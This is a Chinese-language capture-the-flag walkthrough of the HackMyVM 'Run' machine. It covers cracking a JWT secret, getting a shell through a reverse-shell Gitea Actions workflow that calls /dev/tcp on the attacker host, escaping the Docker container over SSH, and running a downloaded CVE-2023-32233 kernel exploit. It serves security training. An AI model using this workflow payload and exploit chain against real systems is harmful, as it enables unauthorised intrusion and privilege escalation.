[HackMyVM]靶场 Run

kali:192.168.56.104

主机发现

arp-scan -l

# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:d2:e0:49, IPv4: 192.168.56.104
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1    0a:00:27:00:00:05       (Unknown: locally administered)
192.168.56.100  08:00:27:bb:bb:02       PCS Systemtechnik GmbH
192.168.56.114  08:00:27:a6:14:7c       PCS Systemtechnik GmbH

靶机:192.168.56.11

端口扫描

nmap 192.168.56.114

PORT     STATE SERVICE
3000/tcp open  ppp

只开了一个3000端口

打开是一个gitea服务

探索里面有flask jwt auth

jwt_token看不见

不过在历史文件里面可以看到

jwt_token = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJmcmVzaCI6ZmFsc2UsImlhdCI6MTcwNzE0ODY1OCwianRpIjoiNjAwMWI5N2YtZjllOC00YTIxLThlYWMtYmE5NWEwY2Y4MDQ4IiwidHlwZSI6ImFjY2VzcyIsInN1YiI6ImRldiIsIm5iZiI6MTcwNzE0ODY1OCwiY3NyZiI6ImFkZjdmOTBiLWQ2NDctNDljZS1hNGRhLTQ3NDI1OWZkYzcyYyIsImV4cCI6MTcwNzE0OTI1OCwidXNlcm5hbWUiOiJkZXYifQ.tRZPFKRfJV7T-EHyQiBFqDEE1hl83MyCGtaBpSMwU_o"

解析一下没什么用

用john爆破一下密码

# hashcat -O -a 0 -m 16500 jwtt.txt /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 5.0+debian  Linux, None+Asserts, RELOC, SPIR, LLVM 16.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: cpu-haswell-12th Gen Intel(R) Core(TM) i7-12700H, 1906/3876 MB (512 MB allocatable), 1MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 0 MB

Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 3 secs

Cracking performance lower than expected?                 

* Append -w 3 to the commandline.
  This can cause your screen to lag.

* Append -S to the commandline.
  This has a drastic speed impact but can be better for specific attacks.
  Typical scenarios are a small wordlist but a large ruleset.

* Update your backend API runtime / driver the right way:
  https://hashcat.net/faq/wrongdriver

* Create more work items to make use of your parallelization power:
  https://hashcat.net/faq/morework

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJmcmVzaCI6ZmFsc2UsImlhdCI6MTcwNzE0ODY1OCwianRpIjoiNjAwMWI5N2YtZjllOC00YTIxLThlYWMtYmE5NWEwY2Y4MDQ4IiwidHlwZSI6ImFjY2VzcyIsInN1YiI6ImRldiIsIm5iZiI6MTcwNzE0ODY1OCwiY3NyZiI6ImFkZjdmOTBiLWQ2NDctNDljZS1hNGRhLTQ3NDI1OWZkYzcyYyIsImV4cCI6MTcwNzE0OTI1OCwidXNlcm5hbWUiOiJkZXYifQ.tRZPFKRfJV7T-EHyQiBFqDEE1hl83MyCGtaBpSMwU_o:developer88

密码是developer88

解析出来用户名是dev

然后用dev/developer88登录gitea

新创建一个仓库

然后在setting里面开启action

创建.gitea/workflows目录并写入一个反弹shell的yaml文件

# mkdir -p .gitea/workflows
                                                                                                                                                                                                                                                                                                  
┌──(root㉿kali2)-[~/Desktop]
└─# cd .gitea/workflows 
                                                                                                                                                                                                                                                                                                  
┌──(root㉿kali2)-[~/Desktop/.gitea/workflows]
└─# vim shell.yaml      
                                                                                                                                                                                                                                                                                                  
┌──(root㉿kali2)-[~/Desktop/.gitea/workflows]
└─# cat shell.yaml      
name: demo
run-name: ${{ github.actor }} is testing out Gitea Action
on: [push]
jobs:
  Explore-Gitea-Actions:
    runs-on: run
    steps:
      - run: /bin/bash -i >& /dev/tcp/192.168.56.104/4567 0>&1
┌──(root㉿kali2)-[~/Desktop/.gitea/workflows]
└─#mv ~/Desktop/.gitea   ~/Desktop/myshell

运行actions需要运行器，下载一个运行器

Gitea | act_runner

现需要注册一个runner

./act_runner register --no-interactive --instance <instance> --token <token>

ip地址就是instance

在设置添加runner里面获取token

# ./act_runner register --no-interactive --instance http://192.168.56.114:3000 --token ralq3rc5Kw1V20XmovyTG0DKBMc6gQuZybTHMYHC

INFO Registering runner, arch=amd64, os=linux, version=v0.2.6. 
INFO Runner name is empty, use hostname 'kali2'.  
DEBU Successfully pinged the Gitea instance server 
INFO Runner registered successfully.

然后run

./act_runner daemon                                                                                                          
INFO[2024-03-07T22:44:44+08:00] Starting runner daemon                       
INFO[2024-03-07T22:44:44+08:00] runner: kali2, with version: v0.2.6, with labels: [ubuntu-latest ubuntu-22.04 ubuntu-20.04 ubuntu-18.04], declare successfully

然后将shell.yaml上传到仓库

┌──(root㉿kali2)-[~/Desktop/myshell/.gitea/workflows]
└─# git config user.email "dev@run.hmv"
                                                                                                                                                                                                                                                                                                  
┌──(root㉿kali2)-[~/Desktop/myshell/.gitea/workflows]
└─# git config user.name "dev"
                                                                                                                                                                                                                                                                                                  
┌──(root㉿kali2)-[~/Desktop/myshell/.gitea/workflows]
└─# git add .
                                                                                                                                                                                                                                                                                                  
┌──(root㉿kali2)-[~/Desktop/myshell/.gitea/workflows]
└─# git commit -m "Testing"
[main (root-commit) 2708ed7] Testing
 1 file changed, 8 insertions(+)
 create mode 100644 .gitea/workflows/shell.yaml
                                                                                                                                                                                                                                                                                                  
┌──(root㉿kali2)-[~/Desktop/myshell/.gitea/workflows]
└─# git push origin main
Username for 'http://192.168.56.114:3000': dev
Password for 'http://dev@192.168.56.114:3000': 
Enumerating objects: 5, done.
Counting objects: 100% (5/5), done.
Compressing objects: 100% (2/2), done.
Writing objects: 100% (5/5), 446 bytes | 446.00 KiB/s, done.
Total 5 (delta 0), reused 0 (delta 0), pack-reused 0
remote: . Processing 1 references
remote: Processed 1 references in total
To http://192.168.56.114:3000/dev/myshell.git
 * [new branch]      main -> main

之前开的监听端口也是返回了shell

不过目前还在docker里面

act@41571465a87b:~/cache/actions/e62fd81b2b2325de/hostexecutor$ ip route show
ip route show
default via 172.18.0.1 dev eth0 
172.18.0.0/16 dev eth0 proto kernel scope link src 172.18.0.4

先那个稳定shell

act@41571465a87b:~/cache/actions/9246c6b12576b1d1/hostexecutor$ sudo su -
sudo su -
script /dev/null -c bash
Script started, output log file is '/dev/null'.
root@41571465a87b:~# ^Z
zsh: suspended  nc -lvnp 4567
                                                                                                                                              
┌──(root㉿kali2)-[~/Desktop]
└─# stty raw -echo;fg
[2]  - continued  nc -lvnp 4567
                               reset
reset: unknown terminal type unknown
Terminal type? xterm

然后逃离docker

看一下ip

ip route show

# default via 172.18.0.1 dev eth0 
# 172.18.0.0/16 dev eth0 proto kernel scope link src 172.18.0.4

ssh连接

root@41571465a87b:~# ssh dev@172.18.0.1
The authenticity of host '172.18.0.1 (172.18.0.1)' can't be established.
ED25519 key fingerprint is SHA256:IGhXsYmgq4sTpoMPHq+MgSiAiNHWOR4ZkocqlvZPGis.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '172.18.0.1' (ED25519) to the list of known hosts.
dev@172.18.0.1's password: 


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

Last login: Tue Feb  6 15:52:41 2024 from 172.18.0.4
dev@run:~$ ls -al
total 32
drwxr-x--- 4 dev  dev  4096 Mar  7 15:16 .
drwxr-xr-x 3 root root 4096 Feb  5 13:10 ..
lrwxrwxrwx 1 root root    9 Feb  5 13:40 .bash_history -> /dev/null
-rw-r--r-- 1 dev  dev   220 Jan  7  2023 .bash_logout
-rw-r--r-- 1 dev  dev  3771 Jan  7  2023 .bashrc
drwx------ 2 dev  dev  4096 Mar  7 15:16 .cache
-rw-r--r-- 1 dev  dev   807 Jan  7  2023 .profile
drwx------ 2 dev  dev  4096 Feb  5 13:10 .ssh
-rw------- 1 dev  dev    33 Feb  6 16:01 user.txt
dev@run:~$ cat user.txt
56f98bdfaf5186243bc4cb99f0674f58

拿到user权限

看linux内核

dev@run:~$ uname -a
Linux run 6.2.0-20-generic #20-Ubuntu SMP PREEMPT_DYNAMIC Thu Apr  6 07:48:48 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux

6.2.0-20-generic搜索知道有个CVE

Linux Kernel 权限提升漏洞 (CVE-2023-32233)-阿里云开发者社区 (aliyun.com)

openwall.com/lists/oss-security/2023/05/15/5/3

apt install gcc libmnl-dev libnftnl-dev

gcc -Wall -o exploit exp.c -lmnl -lnftnl

dev@run:~$ wget http://192.168.56.104:6677/exploit
--2024-03-07 15:24:06--  http://192.168.56.104:6677/exploit
Connecting to 192.168.56.104:6677... connected.
HTTP request sent, awaiting response... 200 OK
Length: 63456 (62K) [application/octet-stream]
Saving to: ‘exploit’

exploit             100%[===================>]  61.97K  --.-KB/s    in 0.003s  

2024-03-07 15:24:06 (24.2 MB/s) - ‘exploit’ saved [63456/63456]

dev@run:~$ ls -al
total 96
drwxr-x--- 4 dev  dev   4096 Mar  7 15:24 .
drwxr-xr-x 3 root root  4096 Feb  5 13:10 ..
lrwxrwxrwx 1 root root     9 Feb  5 13:40 .bash_history -> /dev/null
-rw-r--r-- 1 dev  dev    220 Jan  7  2023 .bash_logout
-rw-r--r-- 1 dev  dev   3771 Jan  7  2023 .bashrc
drwx------ 2 dev  dev   4096 Mar  7 15:16 .cache
-rw-rw-r-- 1 dev  dev  63456 Mar  7 15:22 exploit
-rw-r--r-- 1 dev  dev    807 Jan  7  2023 .profile
drwx------ 2 dev  dev   4096 Feb  5 13:10 .ssh
-rw------- 1 dev  dev     33 Feb  6 16:01 user.txt
dev@run:~$ chmod +x exploit
dev@run:~$ ./exploit
[*] Netfilter UAF exploit


Using profile:
========
1                   race_set_slab                   # {0,1}
1572                race_set_elem_count             # k
4000                initial_sleep                   # ms
100                 race_lead_sleep                 # ms
600                 race_lag_sleep                  # ms
100                 reuse_sleep                     # ms
39d240              free_percpu                     # hex
2a8b900             modprobe_path                   # hex
23700               nft_counter_destroy             # hex
347a0               nft_counter_ops                 # hex
a                   nft_counter_destroy_call_offset # hex
ffffffff            nft_counter_destroy_call_mask   # hex
e8e58948            nft_counter_destroy_call_check  # hex
========

[*] Checking for available CPUs...
[*] sched_getaffinity() => 0 2
[*] Reserved CPU 0 for PWN Worker
[*] Creating "/tmp/modprobe"...
[*] Creating "/tmp/trigger"...
[*] Updating setgroups...
[*] Updating uid_map...
[*] Updating gid_map...
[*] Signaling PWN Worker...
[*] Waiting for PWN Worker...
[*] Starting PWN Worker
[*] Putting on seatbelts
pwn_prepare
pwn_uaf_spray
pwn_delay_spray_set
pwn_uaf_trigger
pwn_uaf_race
pwn_uaf_new_obj
pwn_uaf_dump_rule
[*] Signaling status=11 to coordinator...
[*] Got status=11 from PWN Worker...
[*] Creating "/tmp/modprobe"...
[*] Creating "/tmp/trigger"...
[*] Updating setgroups...
[*] Updating uid_map...
[*] Updating gid_map...
[*] Signaling PWN Worker...
[*] Waiting for PWN Worker...
[*] Starting PWN Worker
[*] Putting on seatbelts
pwn_prepare
pwn_uaf_spray
pwn_delay_spray_set
pwn_uaf_trigger
pwn_uaf_race
pwn_uaf_new_obj
pwn_uaf_dump_rule
[*] Signaling status=11 to coordinator...
[*] Got status=11 from PWN Worker...
[*] Creating "/tmp/modprobe"...
[*] Creating "/tmp/trigger"...
[*] Updating setgroups...
[*] Updating uid_map...
[*] Updating gid_map...
[*] Signaling PWN Worker...
[*] Waiting for PWN Worker...
[*] Starting PWN Worker
[*] Putting on seatbelts
pwn_prepare
pwn_uaf_spray
pwn_delay_spray_set
pwn_uaf_trigger
pwn_uaf_race
pwn_uaf_new_obj
pwn_uaf_dump_rule
[*] Signaling status=11 to coordinator...
[*] Got status=11 from PWN Worker...
[*] Creating "/tmp/modprobe"...
[*] Creating "/tmp/trigger"...
[*] Updating setgroups...
[*] Updating uid_map...
[*] Updating gid_map...
[*] Signaling PWN Worker...
[*] Waiting for PWN Worker...
[*] Starting PWN Worker
[*] Putting on seatbelts
pwn_prepare
pwn_uaf_spray
pwn_delay_spray_set
pwn_uaf_trigger
pwn_uaf_race
pwn_uaf_new_obj
pwn_uaf_dump_rule
[*] Signaling status=11 to coordinator...
[*] Got status=11 from PWN Worker...
[*] Creating "/tmp/modprobe"...
[*] Creating "/tmp/trigger"...
[*] Updating setgroups...
[*] Updating uid_map...
[*] Updating gid_map...
[*] Signaling PWN Worker...
[*] Waiting for PWN Worker...
[*] Starting PWN Worker
[*] Putting on seatbelts
pwn_prepare
pwn_uaf_spray
pwn_delay_spray_set
pwn_uaf_trigger
pwn_uaf_race
pwn_uaf_new_obj
pwn_uaf_dump_rule
[*] Signaling status=11 to coordinator...
[*] Got status=11 from PWN Worker...


[*] No ROOT for you:-(
[*] Please reboot the machine!

重启机器，在做就ok了